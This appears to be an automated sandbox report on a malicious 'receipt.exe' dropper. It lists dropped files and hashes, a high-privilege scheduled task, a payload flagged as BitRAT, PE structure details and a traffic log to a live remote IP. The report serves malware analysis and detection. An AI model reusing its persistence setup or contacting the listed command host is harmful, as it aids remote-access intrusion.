                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1297
                          Entropy (8bit):5.093145713726889
                          Encrypted:false
                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0gxtn:cbk4oL600QydbQxIYODOLedq3xj
                          MD5:A52F88B903A44B3FC99075E491AD6B11
                          SHA1:DDC29FA08F377D15DDAAE9698BEEFB76D2B0EF6E
                          SHA-256:75F003CC2850ADAF0C72456C1231DF5BA5207C59EA05DEED1DCA561F831ADEC7
                          SHA-512:14CF0A14F963225F637F6FD43EB80A194727BFC88D63EDBF57CA766AF59F30B32DE57D58E87FC7889254C26150F5508D0F0DCC2D2FBAC04FCB3B4E8331E4A146
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                          Process:C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):8177152
                          Entropy (8bit):7.173330086107205
                          Encrypted:false
                          SSDEEP:196608:LIRcbH4jSteTGvDxwhzav1yo31CPwDv3uFZjeg2EeJUO9WLQkDxtw3iFFrS6XOfA:LdHsfuDxwZ6v1CPwDv3uFteg2EeJUO9E
                          MD5:A9F5E3E4DF4ED31CB7FB95068D4C240B
                          SHA1:F40E523B5FC1703FCA65F069BAF6CD991A4DCF23
                          SHA-256:03AA67A1CB5896C377E33A6D71FEEDF90088A823E895B35EE651A159A4DC8316
                          SHA-512:791F17B8F6E60BC86E637697BFEFB4694769D6A43882686BD663D64D37F97C1929D54F4C445803662D02E387280D70BE6F870025AC74827E074E8658B6E3EC7A
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_BitRAT, Description: Yara detected BitRAT, Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, Author: Joe Security
                          • Rule: MALWARE_Win_BitRAT, Description: Detects BitRAT RAT, Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........e.............h.......h..y....h...... T.............).......).......).......c......c......c...............[.......c..................;...)...4...,.....).......Rich............................PE..L......`..................-...N.....R.(...........@...........................}..............................................8.(.....:.(.@..................0{..J............................4......2.@...................\.8......................text...=.-.......-................. ..`.rdata..f.............-.............@..@.data.........8.."....8.............@....gfids.......`:.......9.............@..@.tls..........:.......9.............@....rsrc...(.@...:...@...9.............@..@.reloc...J...0{..L...zz.............@..B................................................................................................................................................
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:ISO-8859 text, with no line terminators
                          Category:dropped
                          Size (bytes):8
                          Entropy (8bit):3.0
                          Encrypted:false
                          SSDEEP:3:bf/tn:bXtn
                          MD5:E8DD9C8337A14AE618F9ADF65F4855DD
                          SHA1:1CC2BD7EBD1F7426AEC617B5B039B2529090CA6E
                          SHA-256:3A542822BEB02AB976F97FA2FBF0448B368921CAD54229A9598DC4071C36234F
                          SHA-512:85824E14AA60F9394CDF822954086C24C76E46BC9EDBC1B29658430F25B621398FE1D9E46FE3D26A99A9CED517EC4514C3D4034D5C2AC224B575161097992552
                          Malicious:false
                          Preview:.%....H
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):34
                          Entropy (8bit):3.9986525468781666
                          Encrypted:false
                          SSDEEP:3:oNWXp5vXdPAdA:oNWXpFNV
                          MD5:4F1E689613B0A378B755BDBE95005CD3
                          SHA1:F9B5D69949C1F31BA1CC03AA6E6915115F23920E
                          SHA-256:B181128C655C3A0BFFBE8E8F665EECBEACD810B663315C68765218331384B216
                          SHA-512:13824D97D1E94C6C1D5BE901F5A1391DDD7CDC56D58CA9BFDE27718AB4A4E7302A25A446FCFF96693E0299829A9442E16F030D563A344AAE068B895A5ABB5A9E
                          Malicious:false
                          Preview:C:\Users\user\Desktop\receipt.exe
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1505280
                          Entropy (8bit):7.934061632009417
                          Encrypted:false
                          SSDEEP:24576:9ct1Eh0F4ATi6OKm1Hh1DV2FK/71dEbni7H1o0wwCwTdaPWU0XFpfbICj7J:9aeRKi6Nm1BVV2FI52sHGCdRXFpfbn7
                          MD5:220925C99E482FD480DEDB37CA1B59D3
                          SHA1:828278C1467AF367892469CBCED139533ECCE7E1
                          SHA-256:E2340403396069B5CA3A235A66889ABF2540C8E382BFF1CB704EF2CDB13DADE9
                          SHA-512:55DC454A0CC616FBCBB646646CAD5AA7BEEFDAFD7A6193AD7CA653EACDD2A15FA6D077991135DBD681C74F1CFE16E99A0BABA73AC81048AB77977CE8FCEEDB27
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m4c.................(...........G... ...`....@.. .......................`............`..................................G..W....`.......................@....................................................... ............... ..H............text....'... ...(.................. ..`.rsrc........`.......*..............@..@.reloc.......@......................@..B.................G......H........<...............................................................0.............-.&(....+.&+.*....0..<....... .........%......-.&&(....%-.+.(....+.&..-.&.-.+..+.s....z.*.0..;........(....o....o....s.....,.&+..+.. .Zb.o.....-.&...+..o......*..........2.......0..P.......(....t....o.....,.&..,.&+/.+..+.....-.&+..+..r...p .......o....&..&....X....i2.*......,..B.......0..-.......~....%-.&~..........s....%.-.&+......+.s....*...B(....(....o....*....0..........s.....-.&+......
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1505280
                          Entropy (8bit):7.934061632009417
                          Encrypted:false
                          SSDEEP:24576:9ct1Eh0F4ATi6OKm1Hh1DV2FK/71dEbni7H1o0wwCwTdaPWU0XFpfbICj7J:9aeRKi6Nm1BVV2FI52sHGCdRXFpfbn7
                          MD5:220925C99E482FD480DEDB37CA1B59D3
                          SHA1:828278C1467AF367892469CBCED139533ECCE7E1
                          SHA-256:E2340403396069B5CA3A235A66889ABF2540C8E382BFF1CB704EF2CDB13DADE9
                          SHA-512:55DC454A0CC616FBCBB646646CAD5AA7BEEFDAFD7A6193AD7CA653EACDD2A15FA6D077991135DBD681C74F1CFE16E99A0BABA73AC81048AB77977CE8FCEEDB27
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m4c.................(...........G... ...`....@.. .......................`............`..................................G..W....`.......................@....................................................... ............... ..H............text....'... ...(.................. ..`.rsrc........`.......*..............@..@.reloc.......@......................@..B.................G......H........<...............................................................0.............-.&(....+.&+.*....0..<....... .........%......-.&&(....%-.+.(....+.&..-.&.-.+..+.s....z.*.0..;........(....o....o....s.....,.&+..+.. .Zb.o.....-.&...+..o......*..........2.......0..P.......(....t....o.....,.&..,.&+/.+..+.....-.&+..+..r...p .......o....&..&....X....i2.*......,..B.......0..-.......~....%-.&~..........s....%.-.&+......+.s....*...B(....(....o....*....0..........s.....-.&+......
                          Process:C:\Users\user\Desktop\receipt.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.934061632009417
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:receipt.exe
                          File size:1505280
                          MD5:220925c99e482fd480dedb37ca1b59d3
                          SHA1:828278c1467af367892469cbced139533ecce7e1
                          SHA256:e2340403396069b5ca3a235a66889abf2540c8e382bff1cb704ef2cdb13dade9
                          SHA512:55dc454a0cc616fbcbb646646cad5aa7beefdafd7a6193ad7ca653eacdd2a15fa6d077991135dbd681c74f1cfe16e99a0baba73ac81048ab77977ce8fceedb27
                          SSDEEP:24576:9ct1Eh0F4ATi6OKm1Hh1DV2FK/71dEbni7H1o0wwCwTdaPWU0XFpfbICj7J:9aeRKi6Nm1BVV2FI52sHGCdRXFpfbn7
                          TLSH:4465128A610812C6E09E1D32C1BADCFAC5047FF5EAE5789559B231730A327AF563CDD8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m4c.................(...........G... ...`....@.. .......................`............`................................
                          Icon Hash:7cf292aecae8e896
                          Entrypoint:0x5647da
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x63346DAD [Wed Sep 28 15:52:13 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1647800x57.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1660000xcac0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1740000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x1627e00x162800False0.9364463042136812data7.95312510004089IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x1660000xcac00xcc00False0.37890625data5.058735359480725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1740000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x1663400x800Device independent bitmap graphic, 48 x 96 x 4, image size 1152
                          RT_ICON0x166b400x400Device independent bitmap graphic, 32 x 64 x 4, image size 512
                          RT_ICON0x166f400x200Device independent bitmap graphic, 16 x 32 x 4, image size 128
                          RT_ICON0x1671400x1000Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
                          RT_ICON0x1681400xa00Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                          RT_ICON0x168b400x800Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
                          RT_ICON0x1693400x600Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
                          RT_ICON0x1699400x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16896
                          RT_ICON0x16dd400x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9600
                          RT_ICON0x1703400x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                          RT_ICON0x1715400xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2400
                          RT_ICON0x171f400x600Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                          RT_GROUP_ICON0x1725400xaedata
                          RT_VERSION0x1725f00x31aARC archive data, packed
                          RT_MANIFEST0x17290c0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators
                          DLLImport
                          mscoree.dll_CorExeMain
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 29, 2022 00:54:14.938576937 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.075382948 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.075498104 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.078150988 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.214812040 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.219769955 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.219839096 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.219885111 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.219899893 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.219899893 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.219929934 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.219961882 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.219971895 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.219981909 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.220016003 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.220060110 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.220071077 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.220072031 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.220114946 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.220153093 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.220182896 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.220230103 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.220278025 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.220325947 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.220340967 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.356848955 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.356914997 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.356939077 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.356964111 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.356987953 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.356997013 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357011080 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357029915 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357036114 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357058048 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357060909 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357076883 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357086897 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357110023 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357115984 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357134104 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357146025 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357157946 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357173920 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357181072 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357192993 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357203960 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357217073 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357228041 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357234001 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357245922 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357251883 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357275009 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357299089 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357319117 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357321978 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357347012 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.357352018 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357363939 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.357407093 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.493783951 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493815899 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493835926 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493854046 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493871927 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493890047 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493911028 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493927956 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493938923 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.493947029 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493964911 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493983030 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.493993044 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494000912 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494019985 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494019985 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494038105 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494039059 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494056940 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494071960 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494075060 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494091034 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494092941 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494111061 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494124889 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494127989 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494146109 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494148970 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494163990 CEST8049685192.185.215.87192.168.2.3
